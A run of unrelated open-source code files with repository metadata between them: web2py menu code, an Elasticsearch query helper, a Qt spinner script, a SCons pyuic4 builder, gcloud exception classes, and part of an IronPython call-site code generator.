'http://www.web2py.com/book/default/chapter/08'),
(T('Access Control'), False,
'http://www.web2py.com/book/default/chapter/09'),
(T('Services'), False,
'http://www.web2py.com/book/default/chapter/10'),
(T('Ajax Recipes'), False,
'http://www.web2py.com/book/default/chapter/11'),
(T('Components and Plugins'), False,
'http://www.web2py.com/book/default/chapter/12'),
(T('Deployment Recipes'), False,
'http://www.web2py.com/book/default/chapter/13'),
(T('Other Recipes'), False,
'http://www.web2py.com/book/default/chapter/14'),
(T('Buy this book'), False,
'http://stores.lulu.com/web2py'),
]),
(T('Community'), False, None, [
(T('Groups'), False,
'http://www.web2py.com/examples/default/usergroups'),
(T('Twitter'), False, 'http://twitter.com/web2py'),
(T('Live Chat'), False,
'http://webchat.freenode.net/?channels=web2py'),
]),
(T('Plugins'), False, None, [
('plugin_wiki', False,
'http://web2py.com/examples/default/download'),
(T('Other Plugins'), False,
'http://web2py.com/plugins'),
(T('Layout Plugins'),
False, 'http://web2py.com/layouts'),
])
]
)]
if DEVELOPMENT_MENU: _()
if "auth" in locals(): auth.wikimenu()
| agpl-3.0 | -2,985,467,640,629,348,000 | 43.562914 | 90 | 0.480755 | false |
klahnakoski/cloc | cloc/util/queries/es_query_util.py | 1 | 16380 | # encoding: utf-8
#
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http:# mozilla.org/MPL/2.0/.
#
# Author: Kyle Lahnakoski ([email protected])
#
from __future__ import unicode_literals
from __future__ import division
from datetime import datetime
from .. import struct
from ..cnv import CNV
from .. import strings
from ..collections import COUNT
from ..maths import stats
from ..env.elasticsearch import Index
from ..env.logs import Log
from ..maths import Math
from ..queries import domains, MVEL, filters
from ..struct import nvl, StructList, Struct, split_field, join_field
from ..structs.wraps import wrap
from ..times import durations
TrueFilter = {"match_all": {}}
DEBUG = False
INDEX_CACHE = {} # MATCH NAMES TO FULL CONNECTION INFO
def loadColumns(es, frum):
"""
ENSURE COLUMNS FOR GIVEN INDEX/QUERY ARE LOADED, AND MVEL COMPILATION WORKS BETTER
"""
if isinstance(frum, basestring):
if frum in INDEX_CACHE:
return INDEX_CACHE[frum]
frum = Struct(
name=frum
)
else:
if not frum.name:
Log.error("Expecting from clause to have a name")
if frum.name in INDEX_CACHE:
return INDEX_CACHE[frum.name]
# FILL frum WITH DEFAULTS FROM es.settings
struct.set_default(frum, es.settings)
if not frum.host:
Log.error("must have host defined")
# DETERMINE IF THE es IS FUNCTIONALLY DIFFERENT
diff = False
for k, v in es.settings.items():
if k != "name" and v != frum[k]:
diff = True
if diff:
es = Index(frum)
output = wrap(frum).copy()
schema = es.get_schema()
properties = schema.properties
output.es = es
root = split_field(frum.name)[0]
if root != frum.name:
INDEX_CACHE[frum.name] = output
loadColumns(es, root)
else:
INDEX_CACHE[root] = output
output.columns = parseColumns(frum.index, root, properties)
return output
def post(es, esQuery, limit):
if not esQuery.facets and esQuery.size == 0:
Log.error("ESQuery is sending no facets")
# DO NOT KNOW WHY THIS WAS HERE
# if isinstance(query.select, list) or len(query.edges) and not esQuery.facets.keys and esQuery.size == 0:
# Log.error("ESQuery is sending no facets")
postResult = None
try:
postResult = es.search(esQuery)
for facetName, f in postResult.facets:
if f._type == "statistical":
return None
if not f.terms:
return None
            if not DEBUG and limit and len(f.terms) == limit:
Log.error("Not all data delivered (" + str(len(f.terms)) + "/" + str(f.total) + ") try smaller range")
except Exception, e:
Log.error("Error with ESQuery", e)
return postResult
def buildESQuery(query):
output = wrap({
"query": {"match_all": {}},
"from": 0,
"size": 100 if DEBUG else 0,
"sort": [],
"facets": {
}
})
if DEBUG:
# TO LIMIT RECORDS TO WHAT'S IN FACETS
output.query = {
"filtered": {
"query": {
"match_all": {}
},
"filter": filters.simplify(query.where)
}
}
return output
def parseColumns(index_name, parent_path, esProperties):
"""
RETURN THE COLUMN DEFINITIONS IN THE GIVEN esProperties OBJECT
"""
columns = StructList()
for name, property in esProperties.items():
if parent_path:
path = join_field(split_field(parent_path) + [name])
else:
path = name
childColumns = None
if property.type == "nested" and property.properties:
# NESTED TYPE IS A NEW TYPE DEFINITION
if path not in INDEX_CACHE:
INDEX_CACHE[path] = INDEX_CACHE[parent_path].copy()
INDEX_CACHE[path].name = path
INDEX_CACHE[path].columns = childColumns
columns.append({
"name": struct.join_field(split_field(path)[1::]),
"type": property.type,
"useSource": True
})
continue
if property.properties:
childColumns = parseColumns(index_name, path, property.properties)
columns.extend(childColumns)
columns.append({
"name": join_field(split_field(path)[1::]),
"type": "object",
"useSource": True
})
if property.dynamic:
continue
if not property.type:
continue
if property.type == "multi_field":
property.type = property.fields[name].type # PULL DEFAULT TYPE
            for i, (n, p) in enumerate(property.fields):
if n == name:
# DEFAULT
columns.append({"name": struct.join_field(split_field(path)[1::]), "type": p.type, "useSource": p.index == "no"})
else:
columns.append({"name": struct.join_field(split_field(path)[1::]) + "\\." + n, "type": p.type, "useSource": p.index == "no"})
continue
if property.type in ["string", "boolean", "integer", "date", "long", "double"]:
columns.append({
"name": struct.join_field(split_field(path)[1::]),
"type": property.type,
"useSource": property.index == "no"
})
if property.index_name and name != property.index_name:
columns.append({
"name": property.index_name,
"type": property.type,
"useSource": property.index == "no"
})
elif property.enabled == False:
columns.append({
"name": struct.join_field(split_field(path)[1::]),
"type": property.type,
"useSource": "yes"
})
else:
Log.warning("unknown type {{type}} for property {{path}}", {"type": property.type, "path": path})
# SPECIAL CASE FOR PROPERTIES THAT WILL CAUSE OutOfMemory EXCEPTIONS
for c in columns:
if name == "bugs" and (c.name == "dependson" or c.name == "blocked"):
c.useSource = True
return columns
def compileTime2Term(edge):
"""
    RETURN MVEL CODE THAT MAPS TIME AND DURATION DOMAINS DOWN TO AN INTEGER,
    AND THE JAVASCRIPT THAT WILL TURN THAT INTEGER BACK INTO A PARTITION (INCLUDING NULLS)
"""
if edge.esscript:
Log.error("edge script not supported yet")
# IS THERE A LIMIT ON THE DOMAIN?
numPartitions = len(edge.domain.partitions)
value = edge.value
if MVEL.isKeyword(value):
value = "doc[\"" + value + "\"].value"
nullTest = compileNullTest(edge)
ref = nvl(edge.domain.min, edge.domain.max, datetime(2000, 1, 1))
if edge.domain.interval.month > 0:
offset = ref.subtract(ref.floorMonth(), durations.DAY).milli
if offset > durations.DAY.milli * 28:
offset = ref.subtract(ref.ceilingMonth(), durations.DAY).milli
partition2int = "milli2Month(" + value + ", " + MVEL.value2MVEL(offset) + ")"
partition2int = "((" + nullTest + ") ? 0 : " + partition2int + ")"
def int2Partition(value):
if Math.round(value) == 0:
return edge.domain.NULL
            # value encodes YYYYMM (see milli2Month above); str has no
            # right() method, so slice out the year and month instead
            s = str(value)
            d = datetime(int(s[:4]), int(s[-2:]), 1)
            d = d.addMilli(offset)
return edge.domain.getPartByKey(d)
else:
partition2int = "Math.floor((" + value + "-" + MVEL.value2MVEL(ref) + ")/" + edge.domain.interval.milli + ")"
partition2int = "((" + nullTest + ") ? " + numPartitions + " : " + partition2int + ")"
def int2Partition(value):
if Math.round(value) == numPartitions:
return edge.domain.NULL
return edge.domain.getPartByKey(ref.add(edge.domain.interval.multiply(value)))
return Struct(toTerm={"head": "", "body": partition2int}, fromTerm=int2Partition)
# RETURN MVEL CODE THAT MAPS DURATION DOMAINS DOWN TO AN INTEGER,
# AND THE JAVASCRIPT THAT WILL TURN THAT INTEGER BACK INTO A PARTITION (INCLUDING NULLS)
def compileDuration2Term(edge):
if edge.esscript:
Log.error("edge script not supported yet")
# IS THERE A LIMIT ON THE DOMAIN?
numPartitions = len(edge.domain.partitions)
value = edge.value
if MVEL.isKeyword(value):
value = "doc[\"" + value + "\"].value"
ref = nvl(edge.domain.min, edge.domain.max, durations.ZERO)
nullTest = compileNullTest(edge)
ms = edge.domain.interval.milli
if edge.domain.interval.month > 0:
ms = durations.YEAR.milli / 12 * edge.domain.interval.month
partition2int = "Math.floor((" + value + "-" + MVEL.value2MVEL(ref) + ")/" + ms + ")"
partition2int = "((" + nullTest + ") ? " + numPartitions + " : " + partition2int + ")"
def int2Partition(value):
if Math.round(value) == numPartitions:
return edge.domain.NULL
return edge.domain.getPartByKey(ref.add(edge.domain.interval.multiply(value)))
return Struct(toTerm={"head": "", "body": partition2int}, fromTerm=int2Partition)
# RETURN MVEL CODE THAT MAPS THE numeric DOMAIN DOWN TO AN INTEGER,
# AND THE JAVASCRIPT THAT WILL TURN THAT INTEGER BACK INTO A PARTITION (INCLUDING NULLS)
def compileNumeric2Term(edge):
if edge.script:
Log.error("edge script not supported yet")
if edge.domain.type != "numeric" and edge.domain.type != "count":
Log.error("can only translate numeric domains")
numPartitions = len(edge.domain.partitions)
value = edge.value
if MVEL.isKeyword(value):
value = "doc[\"" + value + "\"].value"
if not edge.domain.max:
if not edge.domain.min:
ref = 0
partition2int = "Math.floor(" + value + ")/" + MVEL.value2MVEL(edge.domain.interval) + ")"
nullTest = "false"
else:
ref = MVEL.value2MVEL(edge.domain.min)
partition2int = "Math.floor((" + value + "-" + ref + ")/" + MVEL.value2MVEL(edge.domain.interval) + ")"
nullTest = "" + value + "<" + ref
elif not edge.domain.min:
ref = MVEL.value2MVEL(edge.domain.max)
partition2int = "Math.floor((" + value + "-" + ref + ")/" + MVEL.value2MVEL(edge.domain.interval) + ")"
nullTest = "" + value + ">=" + ref
else:
top = MVEL.value2MVEL(edge.domain.max)
ref = MVEL.value2MVEL(edge.domain.min)
partition2int = "Math.floor((" + value + "-" + ref + ")/" + MVEL.value2MVEL(edge.domain.interval) + ")"
nullTest = "(" + value + "<" + ref + ") or (" + value + ">=" + top + ")"
partition2int = "((" + nullTest + ") ? " + numPartitions + " : " + partition2int + ")"
offset = CNV.value2int(ref)
def int2Partition(value):
if Math.round(value) == numPartitions:
return edge.domain.NULL
return edge.domain.getPartByKey((value * edge.domain.interval) + offset)
return Struct(toTerm={"head": "", "body": partition2int}, fromTerm=int2Partition)
def compileString2Term(edge):
if edge.esscript:
Log.error("edge script not supported yet")
value = edge.value
if MVEL.isKeyword(value):
value = strings.expand_template("getDocValue({{path}})", {"path": CNV.string2quote(value)})
else:
Log.error("not handled")
def fromTerm(value):
return edge.domain.getPartByKey(value)
return Struct(
toTerm={"head": "", "body": value},
fromTerm=fromTerm
)
def compileNullTest(edge):
"""
RETURN A MVEL EXPRESSION THAT WILL EVALUATE TO true FOR OUT-OF-BOUNDS
"""
if edge.domain.type not in domains.ALGEBRAIC:
Log.error("can only translate time and duration domains")
# IS THERE A LIMIT ON THE DOMAIN?
value = edge.value
if MVEL.isKeyword(value):
value = "doc[\"" + value + "\"].value"
if not edge.domain.max:
if not edge.domain.min:
return False
bot = MVEL.value2MVEL(edge.domain.min)
nullTest = "" + value + "<" + bot
elif not edge.domain.min:
top = MVEL.value2MVEL(edge.domain.max)
nullTest = "" + value + ">=" + top
else:
top = MVEL.value2MVEL(edge.domain.max)
bot = MVEL.value2MVEL(edge.domain.min)
nullTest = "(" + value + "<" + bot + ") or (" + value + ">=" + top + ")"
return nullTest
def compileEdges2Term(mvel_compiler, edges, constants):
"""
TERMS ARE ALWAYS ESCAPED SO THEY CAN BE COMPOUNDED WITH PIPE (|)
GIVE MVEL CODE THAT REDUCES A UNIQUE TUPLE OF PARTITIONS DOWN TO A UNIQUE TERM
GIVE LAMBDA THAT WILL CONVERT THE TERM BACK INTO THE TUPLE
RETURNS TUPLE OBJECT WITH "type" and "value" ATTRIBUTES.
"type" CAN HAVE A VALUE OF "script", "field" OR "count"
CAN USE THE constants (name, value pairs)
"""
# IF THE QUERY IS SIMPLE ENOUGH, THEN DO NOT USE TERM PACKING
edge0 = edges[0]
if len(edges) == 1 and edge0.domain.type in ["set", "default"]:
# THE TERM RETURNED WILL BE A MEMBER OF THE GIVEN SET
def temp(term):
return StructList([edge0.domain.getPartByKey(term)])
if edge0.value and MVEL.isKeyword(edge0.value):
return Struct(
field=edge0.value,
term2parts=temp
)
elif COUNT(edge0.domain.dimension.fields) == 1:
return Struct(
field=edge0.domain.dimension.fields[0],
term2parts=temp
)
elif not edge0.value and edge0.domain.partitions:
script = mvel_compiler.Parts2TermScript(edge0.domain)
return Struct(
expression=script,
term2parts=temp
)
else:
return Struct(
expression=mvel_compiler.compile_expression(edge0.value, constants),
term2parts=temp
)
mvel_terms = [] # FUNCTION TO PACK TERMS
fromTerm2Part = [] # UNPACK TERMS BACK TO PARTS
for e in edges:
domain = e.domain
fields = domain.dimension.fields
if not e.value and fields:
code, decode = mvel_compiler.Parts2Term(e.domain)
t = Struct(
toTerm=code,
fromTerm=decode
)
elif fields:
Log.error("not expected")
elif e.domain.type == "time":
t = compileTime2Term(e)
elif e.domain.type == "duration":
t = compileDuration2Term(e)
elif e.domain.type in domains.ALGEBRAIC:
t = compileNumeric2Term(e)
elif e.domain.type == "set" and not fields:
def fromTerm(term):
return e.domain.getPartByKey(term)
code, decode = mvel_compiler.Parts2Term(e.domain)
t = Struct(
toTerm=code,
fromTerm=decode
)
else:
t = compileString2Term(e)
if not t.toTerm.body:
mvel_compiler.Parts2Term(e.domain)
Log.unexpected("what?")
fromTerm2Part.append(t.fromTerm)
mvel_terms.append(t.toTerm.body)
# REGISTER THE DECODE FUNCTION
def temp(term):
terms = term.split('|')
output = StructList([t2p(t) for t, t2p in zip(terms, fromTerm2Part)])
return output
return Struct(
expression=mvel_compiler.compile_expression("+'|'+".join(mvel_terms), constants),
term2parts=temp
)
def fix_es_stats(s):
"""
ES RETURNS BAD DEFAULT VALUES FOR STATS
"""
s = wrap(s)
if s.count == 0:
return stats.zero
return s
# MAP NAME TO SQL FUNCTION
aggregates = {
"none": "none",
"one": "count",
"sum": "total",
"add": "total",
"count": "count",
"maximum": "max",
"minimum": "min",
"max": "max",
"min": "min",
"mean": "mean",
"average": "mean",
"avg": "mean",
"N": "count",
"X0": "count",
"X1": "total",
"X2": "sum_of_squares",
"std": "std_deviation",
"stddev": "std_deviation",
"var": "variance",
"variance": "variance"
}
| mpl-2.0 | 4,147,176,898,740,721,700 | 31.76 | 145 | 0.575336 | false |
dtbcoinlab/dtbcoin | share/qt/make_spinner.py | 1 | 1035 | #!/usr/bin/env python
# W.J. van der Laan, 2011
# Make spinning .mng animation from a .png
# Requires imagemagick 6.7+
from __future__ import division
from os import path
from PIL import Image
from subprocess import Popen
DTC='img/reload_scaled.png'
DST='../../src/qt/res/movies/update_spinner.mng'
TMPDIR='/tmp'
TMPNAME='tmp-%03i.png'
NUMFRAMES=35
FRAMERATE=10.0
CONVERT='convert'
CLOCKWISE=True
DSIZE=(16,16)
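# Each frame is the source image rotated by (frame + 0.5) / NUMFRAMES * 360
# degrees (frame 0 of 35 is ~5.14 degrees), scaled to DSIZE and written to a
# numbered PNG; imagemagick's `convert` then assembles the PNGs into one MNG.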
im_src = Image.open(DTC)
if CLOCKWISE:
im_src = im_src.transpose(Image.FLIP_LEFT_RIGHT)
def frame_to_filename(frame):
return path.join(TMPDIR, TMPNAME % frame)
frame_files = []
for frame in xrange(NUMFRAMES):
rotation = (frame + 0.5) / NUMFRAMES * 360.0
if CLOCKWISE:
rotation = -rotation
im_new = im_src.rotate(rotation, Image.BICUBIC)
im_new.thumbnail(DSIZE, Image.ANTIALIAS)
outfile = frame_to_filename(frame)
im_new.save(outfile, 'png')
frame_files.append(outfile)
p = Popen([CONVERT, "-delay", str(FRAMERATE), "-dispose", "2"] + frame_files + [DST])
p.communicate()
| mit | 131,144,194,758,330,020 | 23.069767 | 85 | 0.691787 | false |
Kapiche/gcloud-datastore-oem | gcloudoem/exceptions.py | 1 | 8700 | # Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# CHANGED BY Kapiche Ltd.
# Copyright 2015 Kapiche Ltd. All rights reserved.
# Based on work by the good folk responsible for gcloud-python. Thanks folks!
#
"""
Custom exceptions.
"""
from collections import defaultdict
import json
import six
_HTTP_CODE_TO_EXCEPTION = {} # populated at end of module
class GCloudError(Exception):
"""Base error class for gcloud errors (abstract).
Each subclass represents a single type of HTTP error response.
"""
code = None
"""HTTP status code. Concrete subclasses *must* define.
See: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
"""
def __init__(self, message, errors=()):
super(GCloudError, self).__init__()
# suppress deprecation warning under 2.6.x
self.message = message
self._errors = [error.copy() for error in errors]
def __str__(self):
return '%d %s' % (self.code, self.message)
@property
def errors(self):
"""Detailed error information.
:rtype: list(dict)
:returns: a list of mappings describing each error.
"""
return [error.copy() for error in self._errors]
class Redirection(GCloudError):
"""Base for 3xx responses
This class is abstract.
"""
class MovedPermanently(Redirection):
"""Exception mapping a '301 Moved Permanently' response."""
code = 301
class NotModified(Redirection):
"""Exception mapping a '304 Not Modified' response."""
code = 304
class TemporaryRedirect(Redirection):
"""Exception mapping a '307 Temporary Redirect' response."""
code = 307
class ResumeIncomplete(Redirection):
"""Exception mapping a '308 Resume Incomplete' response."""
code = 308
class ClientError(GCloudError):
"""Base for 4xx responses
This class is abstract
"""
class BadRequest(ClientError):
"""Exception mapping a '400 Bad Request' response."""
code = 400
class Unauthorized(ClientError):
"""Exception mapping a '401 Unauthorized' response."""
code = 401
class Forbidden(ClientError):
"""Exception mapping a '403 Forbidden' response."""
code = 403
class NotFound(ClientError):
"""Exception mapping a '404 Not Found' response."""
code = 404
class MethodNotAllowed(ClientError):
"""Exception mapping a '405 Method Not Allowed' response."""
code = 405
class Conflict(ClientError):
"""Exception mapping a '409 Conflict' response."""
code = 409
class LengthRequired(ClientError):
"""Exception mapping a '411 Length Required' response."""
code = 411
class PreconditionFailed(ClientError):
"""Exception mapping a '412 Precondition Failed' response."""
code = 412
class RequestRangeNotSatisfiable(ClientError):
"""Exception mapping a '416 Request Range Not Satisfiable' response."""
code = 416
class TooManyRequests(ClientError):
"""Exception mapping a '429 Too Many Requests' response."""
code = 429
class ServerError(GCloudError):
"""Base for 5xx responses: (abstract)"""
class InternalServerError(ServerError):
"""Exception mapping a '500 Internal Server Error' response."""
code = 500
class NotImplemented(ServerError):
"""Exception mapping a '501 Not Implemented' response."""
code = 501
class ServiceUnavailable(ServerError):
"""Exception mapping a '503 Service Unavailable' response."""
code = 503
def make_exception(response, content, use_json=True):
"""
Factory: create exception based on HTTP response code.
:type response: :class:`httplib2.Response` or other HTTP response object
:param response: A response object that defines a status code as the status attribute.
:type content: string or dictionary
:param content: The body of the HTTP error response.
:type use_json: boolean
:param use_json: Flag indicating if ``content`` is expected to be JSON.
:rtype: instance of :class:`GCloudError`, or a concrete subclass.
:returns: Exception specific to the error response.
"""
message = content
errors = ()
    if isinstance(content, six.string_types):
if use_json:
payload = json.loads(content)
else:
payload = {}
else:
payload = content
message = payload.get('message', message)
errors = payload.get('error', {}).get('errors', ())
try:
klass = _HTTP_CODE_TO_EXCEPTION[response.status]
except KeyError:
error = GCloudError(message, errors)
error.code = response.status
else:
error = klass(message, errors)
return error
def _walk_subclasses(klass):
"""Recursively walk subclass tree."""
for sub in klass.__subclasses__():
yield sub
for subsub in _walk_subclasses(sub):
yield subsub
# Build the code->exception class mapping.
for eklass in _walk_subclasses(GCloudError):
code = getattr(eklass, 'code', None)
if code is not None:
_HTTP_CODE_TO_EXCEPTION[code] = eklass
class ValidationError(AssertionError):
"""
Validation exception.
May represent an error validating a field or a document containing fields with validation errors.
:ivar errors: A dictionary of errors for fields within this document or list, or None if the error is for an
individual field.
"""
errors = {}
field_name = None
_message = None
def __init__(self, message="", **kwargs):
self.errors = kwargs.get('errors', {})
self.field_name = kwargs.get('field_name', None)
self.message = message
def __str__(self):
return six.text_type(self.message)
def __repr__(self):
return '%s(%s,)' % (self.__class__.__name__, self.message)
def __getattribute__(self, name):
message = super(ValidationError, self).__getattribute__(name)
if name == 'message':
if self.field_name:
message = '%s' % message
if self.errors:
message = '%s(%s)' % (message, self._format_errors())
return message
def _get_message(self):
return self._message
def _set_message(self, message):
self._message = message
message = property(_get_message, _set_message)
def to_dict(self):
"""
        Returns a dictionary of all errors within an entity.
Keys are field names or list indices and values are the validation error messages, or a nested dictionary of
errors for an embedded document or list.
"""
def build_dict(source):
errors_dict = {}
if not source:
return errors_dict
if isinstance(source, dict):
for field_name, error in source.items():
errors_dict[field_name] = build_dict(error)
elif isinstance(source, ValidationError) and source.errors:
return build_dict(source.errors)
else:
return six.text_type(source)
return errors_dict
if not self.errors:
return {}
return build_dict(self.errors)
def _format_errors(self):
"""Returns a string listing all errors within a document"""
def generate_key(value, prefix=''):
if isinstance(value, list):
value = ' '.join([generate_key(k) for k in value])
if isinstance(value, dict):
value = ' '.join(
[generate_key(v, k) for k, v in value.items()])
results = "%s.%s" % (prefix, value) if prefix else value
return results
error_dict = defaultdict(list)
for k, v in self.to_dict().items():
error_dict[generate_key(v)].append(k)
return ' '.join(["%s: %s" % (k, v) for k, v in error_dict.items()])
class InvalidQueryError(Exception):
"""Invalid Datastore query."""
pass
class EnvironmentError(Exception):
"""Generally means that connect() wasn't called."""
pass
class DoesNotExist(Exception):
pass
class MultipleObjectsReturned(Exception):
pass
class ConnectionError(Exception):
pass
| apache-2.0 | -6,143,890,875,748,414,000 | 25.934985 | 116 | 0.63931 | false |
llekn/ffado | admin/pyuic4.py | 1 | 1532 | #!/usr/bin/python
#
# Copyright (C) 2007-2008 Arnold Krille
#
# This file is part of FFADO
# FFADO = Free Firewire (pro-)audio drivers for linux
#
# FFADO is based upon FreeBoB.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) version 3 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import imp
def pyuic4_action( target, source, env ):
env.Execute( "pyuic4 " + str( source[0] ) + " > " + str( target[0] ) )
return 0
def pyuic4_string( target, source, env ):
return "building '%s' from '%s'" % ( str(target[0]), str( source[0] ) )
def PyQt4Check( context ):
context.Message( "Checking for pyuic4 (by checking for the python module pyqtconfig) " )
ret = True
try:
imp.find_module( "pyqtconfig" )
except ImportError:
ret = False
context.Result( ret )
return ret
def generate( env, **kw ):
env['BUILDERS']['PyUIC4'] = env.Builder( action=pyuic4_action, src_suffix=".ui", single_source=True )
env['PYUIC4_TESTS'] = { "PyQt4Check" : PyQt4Check }
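    # Typical SConscript usage (illustrative):
    #   env.PyUIC4('ui_mainwindow.py', 'mainwindow.ui')
    # which runs: pyuic4 mainwindow.ui > ui_mainwindow.py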
def exists( env ):
return 1
| gpl-2.0 | -256,141,468,672,272,600 | 29.64 | 102 | 0.706266 | false |
moto-timo/ironpython3 | Src/Scripts/generate_calls.py | 1 | 26135 | #####################################################################################
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# This source code is subject to terms and conditions of the Apache License, Version 2.0. A
# copy of the license can be found in the License.html file at the root of this distribution. If
# you cannot locate the Apache License, Version 2.0, please send an email to
# [email protected]. By using this source code in any fashion, you are agreeing to be bound
# by the terms of the Apache License, Version 2.0.
#
# You must not remove this notice, or any other, from this software.
#
#
#####################################################################################
import sys
from generate import generate
MAX_ARGS = 16
def make_params(nargs, *prefix):
params = ["object arg%d" % i for i in range(nargs)]
return ", ".join(list(prefix) + params)
def make_params1(nargs, prefix=("CodeContext context",)):
params = ["object arg%d" % i for i in range(nargs)]
return ", ".join(list(prefix) + params)
def make_args(nargs, *prefix):
params = ["arg%d" % i for i in range(nargs)]
return ", ".join(list(prefix) + params)
def make_args1(nargs, prefix, start=0):
args = ["arg%d" % i for i in range(start, nargs)]
return ", ".join(list(prefix) + args)
def make_calltarget_type_args(nargs):
return ', '.join(['PythonFunction'] + ['object'] * (nargs + 1))
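# For example, make_calltarget_type_args(2) returns
# 'PythonFunction, object, object, object' (the function, two arguments and
# the return type of the generated C# Func<> signature).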
def gen_args_comma(nparams, comma):
args = ""
for i in range(nparams):
args = args + comma + ("object arg%d" % i)
comma = ", "
return args
def gen_args(nparams):
return gen_args_comma(nparams, "")
def gen_args_call(nparams, *prefix):
args = ""
comma = ""
for i in range(nparams):
args = args + comma +("arg%d" % i)
comma = ", "
if prefix:
if args:
args = prefix[0] + ', ' + args
else:
args = prefix[0]
return args
def gen_args_array(nparams):
args = gen_args_call(nparams)
if args: return "{ " + args + " }"
else: return "{ }"
def gen_callargs(nparams):
args = ""
comma = ""
for i in range(nparams):
args = args + comma + ("callArgs[%d]" % i)
comma = ","
return args
def gen_args_paramscall(nparams):
args = ""
comma = ""
for i in range(nparams):
args = args + comma + ("args[%d]" % i)
comma = ","
return args
method_caller_template = """
class MethodBinding<%(typeParams)s> : BaseMethodBinding {
private CallSite<Func<CallSite, CodeContext, object, object, %(typeParams)s, object>> _site;
public MethodBinding(PythonInvokeBinder binder) {
_site = CallSite<Func<CallSite, CodeContext, object, object, %(typeParams)s, object>>.Create(binder);
}
public object SelfTarget(CallSite site, CodeContext context, object target, %(callParams)s) {
Method self = target as Method;
if (self != null && self._inst != null) {
return _site.Target(_site, context, self._func, self._inst, %(callArgs)s);
}
return ((CallSite<Func<CallSite, CodeContext, object, %(typeParams)s, object>>)site).Update(site, context, target, %(callArgs)s);
}
public object SelflessTarget(CallSite site, CodeContext context, object target, object arg0, %(callParamsSelfless)s) {
Method self = target as Method;
if (self != null && self._inst == null) {
return _site.Target(_site, context, self._func, PythonOps.MethodCheckSelf(context, self, arg0), %(callArgsSelfless)s);
}
return ((CallSite<Func<CallSite, CodeContext, object, object, %(typeParams)s, object>>)site).Update(site, context, target, arg0, %(callArgsSelfless)s);
}
public override Delegate GetSelfTarget() {
return new Func<CallSite, CodeContext, object, %(typeParams)s, object>(SelfTarget);
}
public override Delegate GetSelflessTarget() {
return new Func<CallSite, CodeContext, object, object, %(typeParams)s, object>(SelflessTarget);
}
}"""
def method_callers(cw):
for nparams in range(1, MAX_ARGS-3):
cw.write(method_caller_template % {
'typeParams' : ', '.join(('T%d' % d for d in range(nparams))),
'callParams': ', '.join(('T%d arg%d' % (d,d) for d in range(nparams))),
'callParamsSelfless': ', '.join(('T%d arg%d' % (d,d+1) for d in range(nparams))),
'callArgsSelfless' : ', '.join(('arg%d' % (d+1) for d in range(nparams))),
'argCount' : nparams,
'callArgs': ', '.join(('arg%d' % d for d in range(nparams))),
'genFuncArgs' : make_calltarget_type_args(nparams),
})
def selfless_method_caller_switch(cw):
cw.enter_block('switch (typeArgs.Length)')
for i in range(1, MAX_ARGS-3):
cw.write('case %d: binding = (BaseMethodBinding)Activator.CreateInstance(typeof(MethodBinding<%s>).MakeGenericType(typeArgs), binder); break;' % (i, ',' * (i-1)))
cw.exit_block()
function_caller_template = """
public sealed class FunctionCaller<%(typeParams)s> : FunctionCaller {
public FunctionCaller(int compat) : base(compat) { }
public object Call%(argCount)d(CallSite site, CodeContext context, object func, %(callParams)s) {
PythonFunction pyfunc = func as PythonFunction;
if (pyfunc != null && pyfunc._compat == _compat) {
return ((Func<%(genFuncArgs)s>)pyfunc.__code__.Target)(pyfunc, %(callArgs)s);
}
return ((CallSite<Func<CallSite, CodeContext, object, %(typeParams)s, object>>)site).Update(site, context, func, %(callArgs)s);
}"""
defaults_template = """
public object Default%(defaultCount)dCall%(argCount)d(CallSite site, CodeContext context, object func, %(callParams)s) {
PythonFunction pyfunc = func as PythonFunction;
if (pyfunc != null && pyfunc._compat == _compat) {
int defaultIndex = pyfunc.Defaults.Length - pyfunc.NormalArgumentCount + %(argCount)d;
return ((Func<%(genFuncArgs)s>)pyfunc.__code__.Target)(pyfunc, %(callArgs)s, %(defaultArgs)s);
}
return ((CallSite<Func<CallSite, CodeContext, object, %(typeParams)s, object>>)site).Update(site, context, func, %(callArgs)s);
}"""
defaults_template_0 = """
public object Default%(argCount)dCall0(CallSite site, CodeContext context, object func) {
PythonFunction pyfunc = func as PythonFunction;
if (pyfunc != null && pyfunc._compat == _compat) {
int defaultIndex = pyfunc.Defaults.Length - pyfunc.NormalArgumentCount;
return ((Func<%(genFuncArgs)s>)pyfunc.__code__.Target)(pyfunc, %(defaultArgs)s);
}
return ((CallSite<Func<CallSite, CodeContext, object, object>>)site).Update(site, context, func);
}"""
def function_callers(cw):
cw.write('''class FunctionCallerProperties {
internal const int MaxGeneratedFunctionArgs = %d;
}''' % (MAX_ARGS-2))
cw.write('')
for nparams in range(1, MAX_ARGS-2):
cw.write(function_caller_template % {
'typeParams' : ', '.join(('T%d' % d for d in range(nparams))),
'callParams': ', '.join(('T%d arg%d' % (d,d) for d in range(nparams))),
'argCount' : nparams,
'callArgs': ', '.join(('arg%d' % d for d in range(nparams))),
'genFuncArgs' : make_calltarget_type_args(nparams),
})
for i in range(nparams + 1, MAX_ARGS - 2):
cw.write(defaults_template % {
'typeParams' : ', '.join(('T%d' % d for d in range(nparams))),
'callParams': ', '.join(('T%d arg%d' % (d,d) for d in range(nparams))),
'argCount' : nparams,
'totalParamCount' : i,
'callArgs': ', '.join(('arg%d' % d for d in range(nparams))),
'defaultCount' : i - nparams,
'defaultArgs' : ', '.join(('pyfunc.Defaults[defaultIndex + %d]' % curDefault for curDefault in range(i - nparams))),
'genFuncArgs' : make_calltarget_type_args(i),
})
cw.write('}')
def function_callers_0(cw):
for i in range(1, MAX_ARGS - 2):
cw.write(defaults_template_0 % {
